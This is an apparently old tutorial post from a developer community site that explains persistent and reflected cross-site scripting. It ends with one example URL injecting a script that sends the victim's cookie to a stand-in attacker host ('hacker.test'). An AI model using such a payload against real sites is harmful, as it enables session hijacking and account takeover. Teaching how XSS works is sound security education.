Cross-site scripting

5.52k Fuzzing with ZAP

4.88k How to Use Tamper Data for Hac

3.50k What is Authentication Technol

2.96k Use ZAP Tools for Authenticati

2.57k Session Hijacking Using Wiresh

2.05k Multi Domain SSL Certificates

prev 1 2 3 … 9 next

Cross-site scripting

@kanishka.kaushik

Follow Recommendations Offline Message

about 9 years ago
- 0
- 2
  Positive Vote
- 1
  Negative Vote
- 1
  Save Favourite
- 0
- 0
- 0
- 0
- 1.24k
Comment on it
Cross-site scripting

Cross-site scripting or XSS is a web attack at application layer. XSS rather than targeting the script embedded in a page executed on the server side, it tagets the script executed on the client side. In XSS attack, the hacker injects some malicious script to do something bad in the web page.

When the malicious script provided by the hacker updates the DOM then XSS occurs. Java script is used to deliver the malicious data to the users.

Types of XSS attacks:

There are two types of XSS attacks:
1. Persistent
2. Non-Persistent
Persistent XSS Attacks:

In Persistent XSS attacks, the hacker use to store the malicious code mostly in the database and later this malicious data is used by the end user without filtering it. Every user will experience the infected web application and it continue infecting the application until the same is detected and removed from the database manually. Persistent XSS attack causes more damage as compared to Non-Persistent XSS attack.

Lets suppose that an attacker has submitted some malicious code in an application and with this the malicious code is stored in the database and later when administrator access that code then the hacker will hack the administrator's session and now take the control of application. In order to control the victims cookie, the hacker redirects the victim to a malicious website owned by the hacker. As soon as the victim is redirected to the malicious website the script is executed and the victim cookie details are saved by the hacker and the victim is again redirected to his original website. Once the hacker has all the administrator details, he can make now make changes in his account.

Non-Persistent XSS Attacks:

Non-Persistent XSS is also known as Reflective XSS. In this instead of storing the malicious code in the database, it is executed from the victim's browser only. The malicious script is not permanent and it appears for a short period of time, till the user watches the page.

Let us take an example to demonstrate Non-Persistent XSS:

Dummy URL: http://example/index.php?sessionid=0000001&uname=Sanjay

The username is stored in the URL and by inserting the malicious java script, hacker can easily gain the control of victim's account and then he can make changes in the user account.
```
http://example/index.php?sessionid=0000001&amp;uname=<script>document.location='http://hacker.test/cgi-bin/cookiesteal.cgi?'+document.cookie</script>
```
Tags
Cross-site scripting XSS Persistent XSS Non-Persistent XSS Types of XSS attacks Reflective XSS
Comment on it

Cross-site scripting

Cross-site scripting

Types of XSS attacks:

0 Comment(s)

Comment on it

Unable to start Java!! Mr. Nerd figure out why..

Positive Votes

No Comments

SW1A 1AA

Negative Votes

555-555-0199@example.com

Delete Comment

Post Projects

Manage Company